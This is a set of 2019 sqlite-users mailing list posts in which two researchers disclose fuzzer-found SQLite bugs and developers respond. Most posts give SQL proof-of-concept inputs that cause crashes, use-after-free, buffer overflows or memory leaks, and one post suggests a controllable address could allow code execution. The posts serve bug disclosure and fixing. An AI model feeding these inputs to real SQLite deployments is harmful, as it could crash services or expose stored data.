CREATE TABLE v0 ( v1 TEXT , v2 ) ; 
CREATE TABLE v3 ( v4 , v5 ) ; 
CREATE TABLE v6 ( v7 , v8 ) ; 
INSERT INTO v0 VALUES ( 10 , 2 ) ; 
INSERT INTO v6 VALUES ( 10 , 1 ) ; 
CREATE VIRTUAL TABLE v9 USING rtree ( v12 , v11 , v10 INTEGER UNIQUE ON 
CONFLICT IGNORE AS( v8 ) CHECK( v2 ) ) ; 
SELECT v4 , max ( v4 + v5 ) FROM v6 , v3 AS t ; 
CREATE TABLE v13 ( v15 INTEGER PRIMARY KEY , v14 INT ) ;
 INSERT INTO v0 ( v1 ) VALUES ( 2 ) ,( 10 ) ;
 SELECT * FROM v6 LEFT JOIN v9 ON v12 = 0 OR v11 = 10 WHERE v10 = v11 AND v11 = 
10 ;

(sqlite3.c:141119: Bitmask sqlite3WhereCodeOneLoopStart(Parse *, Vdbe *, 
WhereInfo *, int, WhereLevel *, Bitmask): Assertion `(pTerm->prereqRight & 
pLevel->notReady)!=0' failed.)
—
This bug exists in the development code.

#3
—
CREATE TABLE v0 ( v1 CHAR(2) UNIQUE PRIMARY KEY ON CONFLICT ROLLBACK ) ; 
CREATE TABLE v2 ( v3 INT ) ; 
CREATE INDEX v4 ON v0 ( v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , v1 , 
v1 , v1 , v1 , v1 , v1 ) ;
ANALYZE ; 
SELECT * FROM v2 LEFT JOIN v0 ON v1 = 0 WHERE ( v1 = 'MED P' OR v1 = 'DELIVER 
IN PERSON' ) AND v1 IS NOT NULL ;

(Bitmask sqlite3WhereCodeOneLoopStart(Parse *, Vdbe *, WhereInfo *, int, 
WhereLevel *, Bitmask): Assertion `(pTabItem[0].fg.jointype & JT_LEFT)==0 || 
ExprHasProperty(pOrExpr, EP_FromJoin)’)
—
This bug exists in the development code.


Yongheng & Rui

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Heap Use After Free In sqlite.

[Yongheng Chen]

Hi, 

We found a heap UAF bug in sqlite. Here’s the PoC:

—
CREATE TABLE v0 ( v1 CHECK( CASE v1 WHEN '13' THEN 10 ELSE 10 END ) ) ; CREATE 
TRIGGER x INSERT ON v0 BEGIN INSERT INTO v0 ( v1 , v1 ) SELECT v1 , v1 FROM v0 
WHERE v1 < 10 ON CONFLICT DO NOTHING ; END ; INSERT INTO v0 SELECT * FROM v0 
WHERE v1 OR 0 ; CREATE VIEW v2 ( v3 ) AS WITH x1 AS ( SELECT * FROM v2 ) SELECT 
v3 AS x , v3 AS y FROM v2 ; ALTER TABLE zipfile RENAME TO t3 ;
—

This bug exists in both release code and development code. It triggers uaf with 
asan with release code while triggering an assert in the delevelopment code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Assertion Failed In sqlite3

[Yongheng Chen]

Hi,

We found an assertion violation bug in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ; INSERT INTO v0 VALUES ( 10 ) ; 
SELECT '29' , count () OVER( ORDER BY v1 ) AS m FROM v0 ORDER BY v1 > ( SELECT 
m ) ;
—

The bug exists in the latest development code and release code. 

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Buffer Overflow bugs In Sqlite

[Yongheng Chen]

Hi, 

We found a global buffer overflow and a heap buffer overflow in sqlite. Here’s 
the POC (trigger with asan):

Global buffer overflow:
—
CREATE TABLE v0 ( v6 INTEGER UNIQUE , v5 , v3 , v4 , v2 , v7 , v1 ) ; INSERT 
INTO v0 ( v3 ) VALUES ( 0 ) ,( 10 ) ,( 10.10 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 
10 ) ,( 10 ) ,( 1 ) ,( 'GERMANY' ) ,( 'LG PKG' ) ,( 'SM PKG' ) ,( '%%green%%' ) 
,( 'DELIVER IN PERSON' ) ,( 'MED PKG' ) ; SELECT v5 , lag ( v1 , 10.10 ) 
OVER( PARTITION BY v1 ORDER BY v5 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE 
v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ON 
CONFLICT REPLACE ) ; ANALYZE ; REPLACE INTO v8 SELECT * FROM v0 ; SELECT * FROM 
v0 AS c NATURAL JOIN v0 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v0 ;
—

Heap buffer overflow:
—
CREATE TABLE v0 ( v5 INTEGER UNIQUE , v6 , v7 , v2 , v3 , v4 INTEGER UNIQUE ON 
CONFLICT IGNORE CHECK( 10 ) CHECK( 10 ) , v1 ) ; INSERT INTO v0 ( v4 ) VALUES ( 
10 ) ,( 1 ) ,( 10 ) ; SELECT v4 , lag ( v2 , 0.10 ) OVER( PARTITION BY v4 
ORDER BY v6 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE v8 USING zipfile ( v9 
PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ) ; ANALYZE ; REPLACE INTO v8 
SELECT * FROM v0 ; SELECT * FROM v8 AS c NATURAL JOIN v8 AS p , v0 NATURAL JOIN 
v8 NATURAL JOIN v8 ;
—

The bug exists in the latest development code of sqlite.

Yongheng & Rui

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in sqlite

[Yongheng Chen]

Hi,

We found a crash bug in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ; INSERT INTO v0 ( v1 ) VALUES ( 0 ) 
,( 1 ) ,( 10 ) ON CONFLICT DO NOTHING ; 
CREATE VIRTUAL TABLE v2 USING rtree ( v5 UNIQUE ON CONFLICT ABORT , v4 , v3 ) ; 
SELECT 'MED BOX' - 'a' FROM v0 LEFT JOIN v2 ON v4 = 10 OR v5 = 10 ; SELECT * 
FROM v0 , v0 WHERE v1 = v1 AND v1 = 1;
—
The bug exists in the latest development code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Heap Out of Bound Read in Sqlite

[Yongheng Chen]

This seems a problem of gcc(Ubuntu 5.5.0-12ubuntu5~16.04). When I use this 
specific version to compile sqlite, the problem can be repro.

Just in case you need it, here’s the log I got:
—
SQLite version 3.31.0 2019-12-24 15:35:53
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 
) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) 
FROM v0 ;
=
==25839==ERROR: AddressSanitizer: heap-buffer-overflow on address 
0x634007ff at pc 0x0042c622 bp 0x7ffe62feaf20 sp 0x7ffe62feaf10
READ of size 1 at 0x634007ff thread T0
#0 0x42c621 in zipfileStep /data/xxx/sqlite/asan/shell.c:6243
#1 0x5a30f6 in sqlite3VdbeExec /data/xxx/sqlite/asan/sqlite3.c:91052
#2 0x5c155e in sqlite3Step /data/xxx/sqlite/asan/sqlite3.c:82703
#3 0x5c155e in sqlite3_step /data/xxx/sqlite/asan/sqlite3.c:82768
#4 0x436e0d in exec_prepared_stmt /data/xxx/sqlite/asan/shell.c:11379
#5 0x43da53 in shell_exec /data/xxx/sqlite/asan/shell.c:11684
#6 0x440631 in runOneSqlLine /data/xxx/sqlite/asan/shell.c:18265
#7 0x450f95 in process_input /data/xxx/sqlite/asan/shell.c:18365
#8 0x412a65 in main /data/xxx/sqlite/asan/shell.c:19123
#9 0x7fc3b2a9d82f in __libc_start_main 
(/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#10 0x413e18 in _start (/data/xxx/sqlite/asan/sqlite3+0x413e18)

0x634007ff is located 1 bytes to the left of 12-byte region 
[0x63400800,0x6341dcc0)
allocated by thread T0 here:
#0 0x7fc3b3754662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662)
#1 0x4d2ea0 in sqlite3MemMalloc /data/xxx/sqlite/asan/sqlite3.c:23180
—

Yongheng Chen

> On Dec 24, 2019, at 11:48 AM, Richard Hipp  wrote:
> 
> On 12/24/19, Yongheng Chen  wrote:
>> 
>> When we run it with sqlite compiled with asan, we got a heap overflow crash.
>> 
>> The bug exists in the latest development code.
> 
> Unable to repro.  Tried tip of trunk and release, using gcc and clang,
> all with various combinations of -fsanitize=memory,
> -fsanitize=address, -fsanitize=undefined, and running under valgrind.
> 
> 
> -- 
> D. Richard Hipp
> d...@sqlite.org

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Heap Out of Bound Read in Sqlite

[Yongheng Chen]

Hi,

We found a oob read in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' 
) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ;
—

When we run it with sqlite compiled with asan, we got a heap overflow crash.

The bug exists in the latest development code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Heap overflow leads to crashing or memory dumping(possibly database leaking)

[Yongheng Chen]

Hi,

We found a heap overflow bug in sqlite, which leads to crashing and memory 
dumping. 
Here is the PoC:
—
create table v0(v1 char);
insert into v0 values ('1');
create table v2(v3 text);
insert into v2 values 
("1"),
 ("2"), 
("3");
drop table v2;
insert into v0 select zipfile(v1, NULL) from v0;
insert into v0 select zipfile(v1, NULL) from v0;
insert into v0 select zipfile(v1, NULL) from v0;
select hex(v1) from v0;
—
From the hex result we can spot the data in the deleted table v2. And if we run 
it with address sanitizer, we get a heap overflow crash.

The bug exists in the update to date release code and the development code.


Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash Bug in Sqlite

[Yongheng Chen]

Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 , v2 ) ; 
SELECT 10 , 1 UNION SELECT v2 , dense_rank () OVER( ORDER BY - 10 ) FROM v0 ;
—

This bug exists in both the latest development code and the release code. 

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in Sqlite

[Yongheng Chen]

Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v1 INTEGER PRIMARY KEY ) ;
CREATE VIEW v2 ( v3 ) AS SELECT DISTINCT ( SELECT DISTINCT v1 , v1 , v1 , v3 , 
v1 , v3 , v1 , 10.10 ) ;
CREATE TABLE v4 ( v5 INTEGER PRIMARY KEY , v6 INT );
DELETE FROM v0 WHERE NULL BETWEEN ( SELECT v1 FROM v0 AS x GROUP BY v1 ORDER BY 
10 + sum ( v1 ) OVER( ORDER BY - 10 ) DESC ) AND 10 ;
SELECT * FROM v4 , v2 WHERE v3 = v3 AND v3 = 10;
—

This bug exists in both the latest development code and the release code. (And 
thanks josé for the confirmation every time we report a bug).

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in Sqlite

[Yongheng Chen]

Hi,

We found another crash in Sqlite. Here’s the POC:
—
CREATE TABLE v0 ( v7 FLOAT , v3 DOUBLE , v6 TEXT , v1 INTEGER UNIQUE , v5 
DOUBLE , v2 VARCHAR(20) UNIQUE , v4 ) ;
REPLACE INTO v0 ( v6 , v3 , v2 ) VALUES ( 10 , 10 , 10 );
CREATE VIRTUAL TABLE v8 USING zipfile ( v9 DOUBLE ) ;
REPLACE INTO v8 SELECT * FROM v0;
—

This bug exists in both the latest development code and the release code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash bug in Sqlite

[Yongheng Chen]

Hi,

We found another crash in Sqlite. Here’s the POC:

—
CREATE TABLE v0 ( v2 INTEGER UNIQUE ON CONFLICT IGNORE , v1 TEXT PRIMARY KEY ) ;
CREATE VIEW v3 ( v4 ) AS SELECT v2 IN ( 9223372036854775808 , ( printf () IN ( 
0 , 0 ) ) , 10 , 10 , 10 ) AS AVG_YEARLY FROM v0 ;
CREATE TABLE v5 ( v6 , v7 ) ; INSERT INTO v0 VALUES ( 1.10 , 'y' ) ;
INSERT INTO v5 VALUES ( 10 , 10 ) ; 
INSERT INTO v0 VALUES ( 10 , 10 ) ; 
SELECT DISTINCT v4 FROM v0 LEFT JOIN v3 ON v4 = 10 OR v4 = v3 . v4 ORDER BY v4 ;
—

This bug exists in both the latest development code and the release code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash Bug in Sqlite

[Yongheng Chen]

It’s Yongheng & Rui. Sorry for the typo.

> On Dec 17, 2019, at 4:58 PM, Jose Isaias Cabrera  wrote:
> 
> 
> Yongheng Chen, on Tuesday, December 17, 2019 04:21 PM, wrote...
>> 
>> Hi,
>> 
>> We found a bug that crashes Sqlite. Here’s the test case:
>> 
>> ——
>> CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
>> CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER
>> BY 10 ASC ) ) ) FROM v0 ;
>> SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10
>> );
>> ——
>> 
>> This bug exists in both the development code and the latest release code.
> 
> Yep, 3.30.0 has the problem.
> 
> josé
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org 
> <mailto:sqlite-users@mailinglists.sqlite.org>
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users 
> <http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users>
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash Bug in Sqlite

[Yongheng Chen]

We just took a look at the bug. The value of the accessed address in the crash 
point can be controlled by the value in the second line of the test input, 
which means:

——
…….
CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER BY 1234 
ASC ) ) ) FROM v0 ; 
….. 
—— — 

Then address 1234 will be accessed. We think this has the potential of 
achieving RCE.

Yongheng & Chen


> On Dec 17, 2019, at 4:58 PM, Jose Isaias Cabrera  wrote:
> 
> 
> Yongheng Chen, on Tuesday, December 17, 2019 04:21 PM, wrote...
>> 
>> Hi,
>> 
>> We found a bug that crashes Sqlite. Here’s the test case:
>> 
>> ——
>> CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ;
>> CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER
>> BY 10 ASC ) ) ) FROM v0 ;
>> SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10
>> );
>> ——
>> 
>> This bug exists in both the development code and the latest release code.
> 
> Yep, 3.30.0 has the problem.
> 
> josé
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org 
> <mailto:sqlite-users@mailinglists.sqlite.org>
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users 
> <http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users>
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash Bug in Sqlite

[Yongheng Chen]

Hi, 

We found a bug that crashes Sqlite. Here’s the test case:

——
CREATE TABLE v0 ( v1 UNIQUE , v2 VARCHAR(80) NULL PRIMARY KEY ) ; 
CREATE VIEW v3 ( v4 ) AS SELECT max ( ( SELECT count ( v1 ) OVER( ORDER BY 10 
ASC ) ) ) FROM v0 ; 
SELECT * FROM v3 WHERE - 'b' >= v4 AND v4 > 10 OR ( v4 BETWEEN 10 AND 10 );
——

This bug exists in both the development code and the latest release code.

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] CVE-2019-19317

[Yongheng Chen]

When we report the bugs, we said that they were from 3.31 version, but people 
in mitre changed them to 3.30.1. We just reported what we found. And the commit 
we reported in the bug report is referencing to the official GitHub repo. 

Bugs are found in the latest version, because there are so many bugs in the 
release version that are already been fixed in the development code. So there’s 
no point finding bugs in release version, as we have to verify whether the 
latest code still has such bug anyway. Some bugs we found can reproduced in the 
release version, with slight change in the test case, but when we asked the 
developer to confirm them again. We didn’t get reply as they had been fixed in 
the developing version after we reported them. 


> On Dec 14, 2019, at 5:41 PM, Richard Hipp  wrote:
> 
> On 12/14/19, Raitses, Alex  wrote:
>> Hello,
>> CVE-2019-19317 (https://nvd.nist.gov/vuln/detail/CVE-2019-19317) was
>> submitted on SQLite.
>> As far as I can see the patch is already submitted. Can you confirm please?
>> Do you have estimation for the fixed version release?
> 
> 
> This CVE appears to reference a bug in an unreleased development
> version of SQLite only.  The bug has never appeared in any official
> release version of SQLite, as far as I can tell.  So there is nothing
> to fix.
> 
> The CVE is from a third-party, not one of the SQLite developers.
> There was no coordination between the CVE authors and the SQLite
> developers.
> 
> SQLite is open-source.  Anybody can download our latest development
> code and run fuzzers or other tests against it.  Sometimes those
> people find issues in unreleased code and write CVEs against them,
> even though the problem has never appeared in any release.
> 
> One clue that this is a third-party CVE that does not have the
> endorsement of the SQLite developers is that it references a GitHub
> mirror of the source-code repository, rather than the official Fossil
> source-code repository.  The developers would never do that.
> 
> -- 
> D. Richard Hipp
> d...@sqlite.org
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] A crash bug in sqlite

[Yongheng Chen]

I see. I totally agree with you. A better sqlite is what we all want.

Best.
Yongheng & Rui

> On Dec 9, 2019, at 11:23 AM, Richard Hipp  wrote:
> 
> On 12/9/19, Yongheng Chen  wrote:
>> So should we just report the bugs after another release version?
> 
> No.  You should report problems as soon as you see them.  That is why
> we have open-source.  That is why all of our changes are out there in
> the open where anybody can see them - so that people kind find and
> report problems before they are released.  That is what makes
> open-source so much better the closed-source.
> 
> I was merely responding to Jose, who was wondering why he could not
> reproduce the problem.
> 
> 
> -- 
> D. Richard Hipp
> d...@sqlite.org
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] A crash bug in sqlite

[Yongheng Chen]

So should we just report the bugs after another release version? We think the 
sooner the bugs get fixed, the better in terms of security, as this approach 
can minimize the number of bugs in future release. 

> On Dec 9, 2019, at 10:56 AM, Jose Isaias Cabrera  wrote:
> 
> 
> Since no one explains... ;-)
> 
> Richard Hipp, on Monday, December 9, 2019 10:53 AM, wrote...
>> 
>> On 12/9/19, Jose Isaias Cabrera, on
>>> Error: near "AS": syntax error
>>> 
>>> So, I can't replicate your problem.  thanks.
>> 
>> You have to run off of the latest trunk version, as they are fuzzing
>> for features that are unreleased.
> 
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash Bug Report

[Yongheng Chen]

Thanks for the fix.

> On Dec 9, 2019, at 9:43 AM, Richard Hipp  wrote:
> 
> On 12/8/19, Yongheng Chen  wrote:
>> 
>> We found one crash bug in sqlite,
> 
> Simplified test case:
> 
> CREATE TABLE t1(a);
> CREATE VIEW v2(b) AS WITH t3 AS (SELECT b FROM v2) VALUES(1);
> ALTER TABLE t1 RENAME TO t4;
> 
> Notice how the definition of the V2 view refers to itself.  The ALTER
> TABLE command was failing to detect this circular reference in the
> view definition.  This caused an infinite recursion of attempts to
> resolve the definition of V2, ultimately resulting in a stack
> overflow, which on some systems manifests as a segfault.  Dan checked
> in a fix earlier today.
> 
> -- 
> D. Richard Hipp
> d...@sqlite.org
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] A crash bug in sqlite

[Yongheng Chen]

Hi,

We found a crash bug in sqlite of master branch. Here’s the POC
—
CREATE TABLE v0 ( v2 DOUBLE CHECK( ( v2 IN ( v2 , v1) ) ) , v1 UNIQUE AS( v2 > 
v2 ) ) ;
INSERT INTO v0 VALUES ( 10 );
SELECT v0 . v1 , v0 . v1 FROM v0 JOIN v0 USING ( v1 , v1) ;
—
The bug exists in "SQLite version 3.31.0 2019-12-08 00:06:39” and "SQLite 
version 3.31.0 2019-12-09 08:13:43”. We haven’t tested other versions yet. 
Thanks

Yongheng & Rui
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

Re: [sqlite] Crash Bug Report

[Yongheng Chen]

I haven’t tested many versions. But the most up-to-date master branch and the 
release version has this bug.


> On Dec 8, 2019, at 4:55 PM, Simon Slavin  wrote:
> 
> On 8 Dec 2019, at 7:51pm, Yongheng Chen  wrote:
> 
>> The bug exists in "SQLite version 3.31.0 2019-12-08 00:06:39” and before.
> 
> SQLite version 3.28.0 2019-04-15 14:49:49
> Enter ".help" for usage hints.
> Connected to a transient in-memory database.
> Use ".open FILENAME" to reopen on a persistent database.
> sqlite> CREATE TABLE v0 ( v1 ) ; 
> sqlite> CREATE TABLE v2 ( v3 ) ; 
> sqlite> CREATE VIEW v4 AS WITH x AS ( SELECT x () OVER( ) FROM v4 ) SELECT v3 
> AS x FROM v2 ;
> sqlite> DROP TRIGGER IF EXISTS x ; 
> sqlite> ALTER TABLE v2 RENAME TO t3; 
> sqlite> 
> 
> Not a problem for this version.
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Crash Bug Report

[Yongheng Chen]

Hi,

We found one crash bug in sqlite, which causes a dead loop and then OOM.

CREATE TABLE v0 ( v1 ) ; 
CREATE TABLE v2 ( v3 ) ; 
CREATE VIEW v4 AS WITH x AS ( SELECT x () OVER( ) FROM v4 ) SELECT v3 AS x FROM 
v2 ;
DROP TRIGGER IF EXISTS x ; 
ALTER TABLE v2 RENAME TO t3; 

The bug exists in "SQLite version 3.31.0 2019-12-08 00:06:39” and before.

We reported this bug to one of the developers but didn’t get response. And we 
reported several bugs to the same person one-to-one before (which was required 
by him) and the bugs got fixed but we never got any credits for them. We hope 
somebody else can help us. Thanks. 

Best. 

Yongheng Chen & Rui Zhong
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Bug report

[Yongheng Chen]

Hi,

This is Yongheng Chen from Gatech and Rui Zhong from PSU. We found 7 crashes 
for sqlite of  the newest commit 3842e8f166e23a1ed6e6094105e7a23502d414da. We 
have attached the samples that crash sqlite in the email. FYI, we have also 
reported the bugs for CVE at cve.mitre.org <http://cve.mitre.org/>. 

Thanks,

Yongheng & Rui

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users